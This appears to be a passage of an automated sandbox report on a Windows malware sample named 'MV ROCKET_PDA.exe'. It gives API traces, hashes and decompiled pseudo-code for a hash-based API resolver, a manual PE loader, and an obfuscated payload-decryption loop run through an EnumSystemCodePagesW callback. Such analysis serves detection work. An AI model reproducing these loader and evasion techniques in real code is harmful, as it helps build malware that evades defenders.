                                                                                            0x004055ee
                                                                                            0x00000000
                                                                                            0x004055e4
                                                                                            0x004055c5
                                                                                            0x004055c8
                                                                                            0x004055ca
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004055cc
                                                                                            0x004055ce
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004055d0
                                                                                            0x004055d4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405634
                                                                                            0x0040563e
                                                                                            0x00405644
                                                                                            0x00405644
                                                                                            0x0040564f
                                                                                            0x00000000
                                                                                            0x0040564f
                                                                                            0x00405566
                                                                                            0x0040556d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040552c
                                                                                            0x0040552c
                                                                                            0x0040552e
                                                                                            0x0040565f
                                                                                            0x00405662
                                                                                            0x00405665
                                                                                            0x004056b7
                                                                                            0x004056b7
                                                                                            0x004056b7
                                                                                            0x00405667
                                                                                            0x0040566a
                                                                                            0x00405675
                                                                                            0x0040567a
                                                                                            0x0040567c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040567f
                                                                                            0x00405685
                                                                                            0x0040568b
                                                                                            0x00405691
                                                                                            0x00405693
                                                                                            0x00000000
                                                                                            0x004056af
                                                                                            0x00405695
                                                                                            0x00405699
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040569e
                                                                                            0x00000000
                                                                                            0x004056a5
                                                                                            0x0040566c
                                                                                            0x0040566c
                                                                                            0x00000000
                                                                                            0x0040566c
                                                                                            0x00405534
                                                                                            0x00405538
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405538

                                                                                            APIs
                                                                                            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                                                            • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                                                            • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                                                            • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                                                            • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                                                                            • FindClose.KERNEL32(?), ref: 0040564F
                                                                                            Strings
                                                                                            • "C:\Users\user\Desktop\MV ROCKET_PDA.exe" , xrefs: 004054EC
                                                                                            • \*.*, xrefs: 0040554E
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\MV ROCKET_PDA.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-2984579479
                                                                                            • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                            • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                            • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                            • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45572, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 196filememoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E72E45572(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E72E458E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E72E458E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E72E458E6(_t137, 0x7fb47add);
				_v32 = E72E458E6(_t137, 0x7fe7f840);
				_v24 = E72E458E6(_t137, 0x7fe1f1fb);
				_v28 = E72E458E6(_t137, 0x7f951704);
				_v36 = E72E458E6(_t137, 0x7f91a078);
				_t78 = CreateFileW(E72E458B4( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E72E4584B(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E72E458E6(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							FindCloseChangeNotification(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E72E4584B( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}










































                                                                                            0x72e45572
                                                                                            0x72e4557d
                                                                                            0x72e45580
                                                                                            0x72e45584
                                                                                            0x72e45586
                                                                                            0x72e45589
                                                                                            0x72e4558c
                                                                                            0x72e4558d
                                                                                            0x72e45593
                                                                                            0x72e45594
                                                                                            0x72e4559a
                                                                                            0x72e4559e
                                                                                            0x72e455a2
                                                                                            0x72e455a6
                                                                                            0x72e455aa
                                                                                            0x72e455ae
                                                                                            0x72e455b2
                                                                                            0x72e455c9
                                                                                            0x72e455d2
                                                                                            0x72e455ea
                                                                                            0x72e455f9
                                                                                            0x72e45608
                                                                                            0x72e45617
                                                                                            0x72e45626
                                                                                            0x72e45643
                                                                                            0x72e4564c
                                                                                            0x72e4564e
                                                                                            0x72e45650
                                                                                            0x72e45656
                                                                                            0x72e45736
                                                                                            0x72e45736
                                                                                            0x72e45738
                                                                                            0x72e45738
                                                                                            0x72e4573b
                                                                                            0x72e4573d
                                                                                            0x72e45740
                                                                                            0x72e45740
                                                                                            0x72e45745
                                                                                            0x00000000
                                                                                            0x72e45764
                                                                                            0x72e4574a
                                                                                            0x72e4574c
                                                                                            0x72e4574e
                                                                                            0x72e4575a
                                                                                            0x72e4575c
                                                                                            0x72e45763
                                                                                            0x72e45763
                                                                                            0x72e4575e
                                                                                            0x72e4575e
                                                                                            0x72e4575e
                                                                                            0x72e45750
                                                                                            0x72e45756
                                                                                            0x72e45756
                                                                                            0x72e4574e
                                                                                            0x72e45769
                                                                                            0x72e4576e
                                                                                            0x72e45778
                                                                                            0x72e45778
                                                                                            0x72e45783
                                                                                            0x72e45783
                                                                                            0x72e4565e
                                                                                            0x72e45661
                                                                                            0x72e45667
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e45679
                                                                                            0x72e4567d
                                                                                            0x00000000
                                                                                            0x72e45698
                                                                                            0x72e4569d
                                                                                            0x72e456ac
                                                                                            0x72e456af
                                                                                            0x72e456b2
                                                                                            0x72e456b7
                                                                                            0x72e45732
                                                                                            0x00000000
                                                                                            0x72e45732
                                                                                            0x72e456c0
                                                                                            0x72e456c5
                                                                                            0x72e456ce
                                                                                            0x72e45707
                                                                                            0x72e45707
                                                                                            0x72e45714
                                                                                            0x72e45718
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e4571a
                                                                                            0x72e4571f
                                                                                            0x72e45722
                                                                                            0x72e45722
                                                                                            0x72e4572d
                                                                                            0x00000000
                                                                                            0x72e456d0
                                                                                            0x72e456d3
                                                                                            0x72e456d9
                                                                                            0x72e456db
                                                                                            0x72e456de
                                                                                            0x72e456ea
                                                                                            0x72e456f5
                                                                                            0x72e456fa
                                                                                            0x72e456fd
                                                                                            0x72e45700
                                                                                            0x72e45703
                                                                                            0x00000000
                                                                                            0x72e456de
                                                                                            0x72e456ce

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,?,Pbr), ref: 72E4564C
                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,Pbr,72E452FA,7FC6FA16,72E454B9), ref: 72E45676
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,000000FF,?,00000000,?,?,?,?,?,?,?,?,Pbr,72E452FA,7FC6FA16), ref: 72E4568D
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,Pbr,72E452FA,7FC6FA16,72E454B9), ref: 72E456AF
                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,Pbr,72E452FA,7FC6FA16,72E454B9,000000FF,00000000), ref: 72E45722
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,Pbr,72E452FA,7FC6FA16,72E454B9), ref: 72E4572D
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,Pbr,72E452FA,7FC6FA16,72E454B9,000000FF), ref: 72E45778
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                            • String ID: Pbr
                                                                                            • API String ID: 656311269-4055934431
                                                                                            • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                            • Instruction ID: cbf34d6095f58d10728f75cee2a556501052f0eba28aeecac012030310fe60a3
                                                                                            • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                            • Instruction Fuzzy Hash: B7617235E00704EBCB11DFA9E984BAEB7B5AF58714F209069F906EB390EE749D01CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E42170, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E72E42170() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				void* _t120;

				_v16 = _v16 & 0x00000000;
				_t120 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t120;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x147d) {
						_t14 = E72E45170 + _v12; // 0x28000000
						_v5 =  *_t14;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000a4;
						_v5 = (_v5 & 0x000000ff) + 0xad;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = (_v5 & 0x000000ff) - 0xa3;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xec;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + 0xf1;
						_v5 = _v5 & 0x000000ff ^ 0x0000001e;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x00000033;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = (_v5 & 0x000000ff) - 0xc5;
						_v5 = _v5 & 0x000000ff ^ 0x0000009b;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x8a;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = (_v5 & 0x000000ff) + 0xe1;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						 *((char*)(E72E45170 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					EnumSystemCodePagesW(E72E45170, 0); // executed
				}
				return 0;
			}







                                                                                            0x72e42176
                                                                                            0x72e42188
                                                                                            0x72e4218e
                                                                                            0x72e42195
                                                                                            0x72e421a8
                                                                                            0x72e421b0
                                                                                            0x72e421b4
                                                                                            0x72e421c1
                                                                                            0x72e421d1
                                                                                            0x72e421d7
                                                                                            0x72e421e1
                                                                                            0x72e421ed
                                                                                            0x72e421f9
                                                                                            0x72e4220c
                                                                                            0x72e42218
                                                                                            0x72e42221
                                                                                            0x72e42233
                                                                                            0x72e4223c
                                                                                            0x72e42248
                                                                                            0x72e42251
                                                                                            0x72e42264
                                                                                            0x72e4226e
                                                                                            0x72e42278
                                                                                            0x72e42281
                                                                                            0x72e4228b
                                                                                            0x72e42294
                                                                                            0x72e422a7
                                                                                            0x72e422b0
                                                                                            0x72e422ba
                                                                                            0x72e422c6
                                                                                            0x72e422d0
                                                                                            0x72e422da
                                                                                            0x72e422e4
                                                                                            0x72e422f7
                                                                                            0x72e42303
                                                                                            0x72e4230f
                                                                                            0x72e42318
                                                                                            0x72e42322
                                                                                            0x72e42334
                                                                                            0x72e4233e
                                                                                            0x72e42347
                                                                                            0x72e4235a
                                                                                            0x72e42363
                                                                                            0x72e4236f
                                                                                            0x72e42382
                                                                                            0x72e4238e
                                                                                            0x72e423a0
                                                                                            0x72e423aa
                                                                                            0x72e423b4
                                                                                            0x72e423be
                                                                                            0x72e423c7
                                                                                            0x72e421be
                                                                                            0x72e421be
                                                                                            0x72e423d9
                                                                                            0x72e423d9
                                                                                            0x72e423e4

                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 72E42181
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 72E42188
                                                                                            • memset.MSVCRT ref: 72E421A8
                                                                                            • EnumSystemCodePagesW.KERNELBASE(72E45170,00000000), ref: 72E423D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateCodeEnumPagesProcessSystemmemset
                                                                                            • String ID: pFt
                                                                                            • API String ID: 3396865476-726567960
                                                                                            • Opcode ID: 56d6e9d5ca2f08fec23a33f7f5efb2cdb63bad27325bf737e47148eac91a6bcf
                                                                                            • Instruction ID: 7e3dce4848c4df29554279f3f3d7cbbbbb7fb18b1b1c4c2e04b223782d3a6f62
                                                                                            • Opcode Fuzzy Hash: 56d6e9d5ca2f08fec23a33f7f5efb2cdb63bad27325bf737e47148eac91a6bcf
                                                                                            • Instruction Fuzzy Hash: CC817754D5D2D8ADDB06CBED44247FCBFB05E26202F0841CAE4E5A6283C57A938EDB25
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}




                                                                                            0x00405ecd
                                                                                            0x00405ed6
                                                                                            0x00000000
                                                                                            0x00405ee3
                                                                                            0x00405ed9
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                            • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                            • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                            • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 84%
                                                                                            			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "gqjlpjiaybpobgywdcz Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
